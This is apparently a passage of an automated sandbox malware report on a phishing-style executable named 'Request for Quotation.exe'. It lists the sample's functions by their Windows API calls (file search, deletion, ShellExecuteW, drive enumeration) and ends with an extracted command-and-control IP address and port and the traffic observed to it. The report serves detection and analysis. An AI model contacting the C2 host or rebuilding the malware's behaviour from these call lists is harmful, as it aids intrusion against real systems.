p,wcscmp,wcscmp,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,_CxxThrowException,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIABV12@I@Z,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,_CxxThrowException,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,FindClose,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE1_2_0040477E
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: 1_2_00403325 ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,FindFirstFileW,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,FindNextFileW,FindNextFileW,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,1_2_00403325
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: 1_2_00412BEE wcscpy,wcscpy,wcscat,wcscat,wcscpy,wcscat,FindFirstFileW,wcscpy,RemoveDirectoryW,FindNextFileW,wcscat,RemoveDirectoryW,wcscpy,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,1_2_00412BEE
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: 1_1_00404C0A wcscmp,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,tolower,tolower,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,FindFirstFileW,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,FindNextFileW,wcscmp,wcscmp,wcscmp,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@G@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,tolower,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIABV12@I@Z,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,FindClose,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,1_1_00404C0A
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: 1_1_0040751B Sleep,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,getenv,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,FindFirstFileA,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,FindClose,FindNextFileA,FindNextFileA,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,DeleteFileA,GetLastError,FindClose,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,FindClose,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,1_1_0040751B
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: 1_1_00410586 ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ,?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,FindFirstFileW,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z,??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z,??1?$basic_string@GU?$char_tr1_1_00410586
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: 1_1_0040728F Sleep,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,getenv,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,FindFirstFileA,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,FindClose,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,FindNextFileA,FindNextFileA,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,DeleteFileA,DeleteFileA,GetLastError,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,DeleteFileA,GetLastError,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,FindClose,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,1_1_0040728F
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: 1_1_0040477E _EH_prolog,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,#23,#4,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,_CxxThrowException,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,FindFirstFileW,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,_CxxThrowException,FindNextFileW,wcscmp,wcscmp,wcscmp,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,_CxxThrowException,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIABV12@I@Z,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,_CxxThrowException,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,FindClose,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,?c_s1_1_0040477E
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: 1_1_00403325 ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,FindFirstFileW,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,FindNextFileW,FindNextFileW,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,1_1_00403325
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: 1_1_00412BEE wcscpy,wcscpy,wcscat,wcscat,wcscpy,wcscat,FindFirstFileW,wcscpy,RemoveDirectoryW,FindNextFileW,wcscat,RemoveDirectoryW,wcscpy,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,1_1_00412BEE
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: 3_2_0040AE51 FindFirstFileW,FindNextFileW,3_2_0040AE51
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: 4_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,4_2_00407898
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: 5_2_00407C87 FindFirstFileA,FindNextFileA,strlen,strlen,5_2_00407C87
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: 1_2_00403C4A ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,SetEvent,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,ShellExecuteW,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ,?substr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBE?AV12@II@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,GetLogicalDriveStringsA,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDII@Z,?resize@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEXI@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$cha1_2_00403C4A

          Networking:

          barindex
          C2 URLs / IPs found in malware configurationShow sources
          Source: Malware configuration extractorURLs: 103.89.88.238
          Source: global trafficTCP traffic: 192.168.2.4:49726 -> 103.89.88.238:4299
          Source: Joe Sandbox ViewIP Address: 103.89.88.238 103.89.88.238
          Source: Joe Sandbox ViewASN Name: VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN
          Source: unknownTCP traffic detected without corresponding DNS query: 103.89.88.238
          Source: unknownTCP traffic detected without corresponding DNS query: 103.89.88.238
